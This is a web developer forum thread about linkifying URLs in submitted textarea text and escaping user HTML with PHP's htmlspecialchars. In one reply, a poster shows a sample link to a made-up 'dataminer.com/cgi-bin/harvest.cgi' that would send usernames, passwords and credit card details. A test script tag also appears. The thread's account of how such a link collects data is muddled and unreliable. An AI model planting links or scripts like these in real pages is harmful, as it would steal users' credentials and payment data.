• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 221
  • Last Modified:

this text area

Hi,

How does this site (experts exchange) handle the text area I'm currently writing in, specifically with urls? I'd like to do something similar, I guess after the user submits a question they parse the text for URL's and if one exists replace it with an href etc? Then when we view the question again, only straight html is being rendered? (ie- there is no more text area there right?).

Also, if this box is just a text area, how did they get this light blue font,font size, font type in it?

Any working examples of this would be great,

Thanks
0
minnirok
Asked:
minnirok
  • 5
  • 4
  • 3
2 Solutions
 
BogoJokerCommented:
Hi minnirok,

Right now it is not a rich text editor.
The only thing that comes up cool is ANY webpage link, and personally I think that is done automatically by your browser.
For example:
http://www.google.com
www.google.com

There has been a suggestion to implement a rich text editor, and I will send you a link if your intrested in a very nice one that will format code.

Joe P
0
 
minnirokAuthor Commented:
Hi Joe,

I am mega confused, so if you're looking at this very post right now and I type www.cnn.com how can you click that link on your end? Here while I'm typing this right now I cannot click on www.cnn.com. But after I hit post I will be able to. So are they just rendering whatever text is captured in this box as straight html later on, with the links changed into hrefs? Or is it possible to put url's inside a text area?

If you have a good cross browser rich text area that'd be great to see. I'm having a lot of trouble implementing one that is cross browser and for which I can toggle read only vs write state on the fly,

Thanks
0
 
BogoJokerCommented:
Most rich text editors have basic things like, [b]text[/b] syntax, where when you push submit, they run their scripts, and turn that into a bold tag, meanwhile any <b>text</b> text that you write will not do anything.  That is the control they have placed on their text editor.  I don't know if EE specifically scans the text I am writing for any www.text.com and turns that into a link.  I always thought that maybe my browser finds that text and turns it into a link, but I am not sure.

The suggestion link is here:
http://www.experts-exchange.com/Community_Support/Suggestions/Q_21761945.html
The idea of a rich text editor for code he provided was:
http://qbnz.com/highlighter/

Joe P
0
NEW Veeam Backup for Microsoft Office 365 1.5

With Office 365, it’s your data and your responsibility to protect it. NEW Veeam Backup for Microsoft Office 365 eliminates the risk of losing access to your Office 365 data.

 
minnirokAuthor Commented:
I think I'll just have to go with this idea of capturing the text in a textarea, then converting it to html for redisplay later. It seems this is what EE is doing right now.
0
 
BogoJokerCommented:
Well, if your using php, when you get the value in the textbox that was submitting in a form using $_POST, then the information if you display it right then and there will be html code.  For instance if the user put <b>Text</b> it would actually display Text in bold!

On the other hand if you process that text through a function like htmlspecialchars($_POST['txt') then you display it you will literally see this: <b>Text</b> instead of actual bold text that would have been displayed with the situation in my original sentance.

It is MUCH safer to run the user input through such a function because the user could use some html code, specifically using <script></script> to damage your website.  So many other people decided to make their own list of controls, hence the bracket notation [b]text[/b] would be bold, and a few others that they could control.

Joe P
0
 
minnirokAuthor Commented:
Hey Joe,

Hmm I guess EE must do that too then? I will try it right here:

<b>Some Text</b>
<u>Something else</u>
<script>alert("hello!");</script>

I'd not want to have that stuff appear as html, you're right. Just the links and that's it.
0
 
rattletrapCommented:
minnirok,

This is more of a cgi-ish/php-ish type question, but it looks like you work with php, mysql, and a few other things so explaining this (as i apply it) should be simple enough. What is happening, basically, say I type in http://www.zap.com and it enters as plain text in the text area. Since it is plain text I can not click on it here to test it. Once I submit this form a parsing routine should engage and look for problems and/or malicious code/text/program calls. There are a variety of ways to parse input data. A parsing routine may look for opening and/or closing brackets and convert them from invokable symbols to functional characters. (i.e.; less than sign opening bracket  <  might be changed to &lt; ) similar to the concept you use if you want to explain to someone how to create an HTML link on their own web site. not sure if this will present below, but I will give it a shot...
**

&lt;A href="http://www.zap.com"&gt;www.ZaP.com</A>;

**

on a standard web page the above would show all of the brackets and such to make a web link instead of just making a clickable link. At any rate, you would use all of this to ensure submissions are clear of bad stuff and then write the parsed or cleansed data to a file or data base. When the web user opens the page in question the saved data file would be opened and read/interpretted including parsing urls to active links, or rendering to plain text form, if you the webmaster so choose. I am sure you can see the benefits and potential liabilities of parsing or not parsing urls, but heres a quick example. Say your web site is called zap.com and you have a member login area where input such as this text is entered and read. If somoen wants to mess around they could submit a link that captures data and forwards it, in the open, across the net to whereever the poster wants in to go. Not sure if the below will present due to munging and parsing on the side of EE, but I will give it a shot and I think you will immediately understand what I mean.

**

<A href="http://www.dataminer.com?username=$username&password=$password&crdcardno=$crdcardno&expdate=$expdate&authno=$authno">freemoneygrab.com</A>

**

If the above presents as a link move your mouse over and note the actual link (most people might not pay attention) http://www.dataminer.com?username=$username&password=$password&crdcardno=$crdcardno&expdate=$expdate&authno=$authno is the actual link and could pass data. Hope this helps answer your question if more clarity is required let me know...

Toni
0
 
rattletrapCommented:
After posting above it looks like all EE is doing is looking for known web link identifiers and transforming to links (not sure I like that), BUT...  They seem to be looking through the data stream for character matches like http://  or  www. or  .com .net (whatever). They are pushing forward a straight link based on the input (note my sample above) so they take www.ZaP.com and exclose it in the href Anchor tag.

Just out of curiosity how does EE parse an email address in the form of email@email.com

Toni
0
 
minnirokAuthor Commented:
Hi Toni,

I don't understand the danger of the weblink for that dataminer.com example - what data is it actually transmitting that's harmful? I see the username = $username etc, but where is $username coming from?

 Do you have any recommended parsers I could use to manage all this stuff (grabbing the contents of the text box, parsing it, returning a non-diabolical string when I want to render it as html later on)?

Thanks!
0
 
rattletrapCommented:
Just thinking outside the box is all...

The idea is you are passing data around as your web user does things, an improper url COULD pass any available VARIABLES. In the imaginary situation I showed I was merely suggesting the available variables could be collected and passed. I actually forgot to type something in the link, but look below:


***
&lt;A href="http://www.dataminer.com/cgi-bin/harvest.cgi?username=$username&password=$password&crdcardno=$crdcardno&expdate=$expdate&authno=$authno"&gt;freemoneygrab.com&lt;/A&gt;


***

okay... assuming your site has unprotected variables someone could determine the name values you use to pass information, within your site, and they could potentially collect those values when the link they upload is executed. Some variable names can be determined by viewing source code and looking at form element names. Not rocket science tough to figure out.

 In my example say dataminer.com uses a cgi script called harvest. ALL the items appearing after the ? question mark are the query string sent to the harvest script. These items can be separated into name/value pairs for use or storage. There are many ways one could collect data and pass it. In this example since the script that presents the data they submitted with their link (on your originating web site) has executable function the link may be able to grab things to  pass. Consider STDERR, STDIN, and STDOUT as potential concerns.


<input type=text name=username>
<input type=hidden name=username value="$username">

Either of these could potentially load username = $username depending on several things.

Obviously, this example would be a malicious user and generally they are willing to invest a little time to get into things.

Short answer is: you colllect their input and a smart programmer protects and controls how it is re-displayed...

Hope that helps

Toni
0
 
BogoJokerCommented:
I have not actually seen EE parse an email.
But here is a sample regular expression to detect an email:
/[a-z0-9_\-]+(\.[_a-z0-9\-]+)*@([_a-z0-9\-]+\.)+(com|edu|gov|net|org|[a-z]{2})/i

Note that this will take any two letter combination, joe@fake.us would work, just remove |[a-z]{2} if you don't want to accept those two letter combinations.  I also made the entire script case insensitive with the /i at the end.

Give credit where credit is due, I modified this email regex from the Regular Expression Tester Firefox Extension:
https://addons.mozilla.org/firefox/2077/

0
 
minnirokAuthor Commented:
Ok I will give this all a try, be back shortly.

Thanks
0

Featured Post

Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

  • 5
  • 4
  • 3
Tackle projects and never again get stuck behind a technical roadblock.
Join Now